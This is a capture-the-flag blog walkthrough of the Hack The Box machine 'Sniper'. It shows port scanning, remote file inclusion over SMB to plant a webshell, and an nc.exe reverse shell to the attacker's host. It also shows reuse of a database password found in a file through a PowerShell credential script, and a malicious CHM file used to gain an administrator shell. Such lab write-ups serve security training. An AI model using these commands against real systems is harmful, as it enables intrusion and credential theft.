Hackthebox – Sniper

As with any system, I start with a series of port scans, including a -A scan.

root@kalivm:~/Sniper# nmap -A 10.10.10.151 -oN fullscan-A
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 09:52 CEST
Nmap scan report for 10.10.10.151
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11T14:52:34
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   13.12 ms 10.10.12.1
2   13.23 ms 10.10.10.151 (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds

I see that there are only few ports open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate interest so I continue to browse through the web pages.

At one point in the blog, I see an which accepts a parameter so I start playing with it. Since it can be vulnerable for injection, I start with Local and Remote File injections.¬† After some trial and error I find that neither local nor remote file inclusion work over HTTP so I continue my search to see if anyhting else is possible. With this research, I find this link on RFI based on SMB. So I reconfigure my SMB server to have a share that is called ‘sniper’ and see if I can replicate what is written in the examples.

After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.

The Web shell allows me to browse around the file system and invoke commands as if I got an actual shell. And after some browsing around in the web root of sniper, I find a db.php file.

The db.php file contains some username and password, as they may be interesting, I note them for further use and decide that it is time to try to get a decent shell.

So first I use Powershell to transfer netcat across.

And then I call nc.exe and get shell on Sniper.

root@kalivm:~/Sniper# nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.151 49707
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\sedje>whoami
whoami
nt authority\iusr

C:\sedje>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount           
Guest                    WDAGUtilityAccount       
The command completed with one or more errors.

So I got the shell as iUSR, the default IIS user and there is only one other regular user on the box called Chris. Maybe, the database password is the same as the user password so I want to try and use PowerShell to escalate my privileges. After some searching how I can use the password with a PowerShell command, I came across a script on stackoverflow and decided to modify it to my needs.

root@kalivm:~/Sniper# cat getshell.ps1 
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession

Again, I use PowerShell to transfer the file and then execute it.

c:\sedje>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>

Now, as user chris, I found out that the shell was not fully functional so the next step is to see if I at least can get a shell back to my kali box.

[localhost]: PS C:\Users\Chris\Documents> c:\sedje\nc.exe 10.10.12.78 9002 -e powershell
c:\sedje\nc.exe 10.10.12.78 9002 -e powershell

And in another terminal I have started a listener.

root@kalivm:~/Sniper# nc -nlvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.151 49755
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29<NOFLAG>500c1ad716cf56e

So I get the now fully functional shell and can grab the flag!

Privilege Escalation

After some browsing through Chris’ home directory and its sub directories, I found a file that was interesting.

PS C:\Users\Chris> dir Downloads
dir Downloads

Directory: C:\Users\Chris\Downloads

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm

A Compliled HTML help file, those are not too commonly used anymore as far as I know, so this could be interesting. After some further searching on the system, I also encountered something in the Docs directory in the root of the C:\ drive.

PS C:\> dir Docs
dir Docs

Directory: C:\Docs

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf

PS C:\> cd Docs
cd Docs
PS C:\Docs> type note.txt
type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a
lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

So apparently the instructions.chm file is what Chris has to prepare for the CEO and then drop into this directory. After some talking to people on Discord, I got a link to this very useful guide on how to create a malicious CHM file. One of the unfortunate things for this approach is that it requires a Windows Machine. So I had to fix my VM with an evaluation version to run the HTML Help Workshop tool. Anyway, after doing so, it was a matter of starting a new project.

Simply clicking Next, next, and finish.

And then adding an HTML file with a malicious payload in it. And after some testing and compiling I got the right payload.

Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\sedje\sedje.chm


Compile time: 0 minutes, 0 seconds
1	Topic
0	Local links
0	Internet links
0	Graphics


Created c:\Users\sedje\sedje.chm, 10,624 bytes
Compression increased file by 10,078 bytes.

I compiled the latest version with a working payload in the HTMLHelp Workspace, it responds with this message stating that  compiling was completed and the CHM file created. So I transfer it back to my Kali machine so that I can pick it up again with Powershell from Sniper.

PS C:\Docs> Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm
Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm

From the Sniper host, I do an Invoke-WebRequest again to download the CHM file to the required directory while having a netcat listener waiting for the shell to pop

root@kalivm:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736   
Microsoft Windows [Version 10.0.17763.678]     
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363<NOFLAG>4f6be0b7436c15

The shell pops and I get my root flag!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.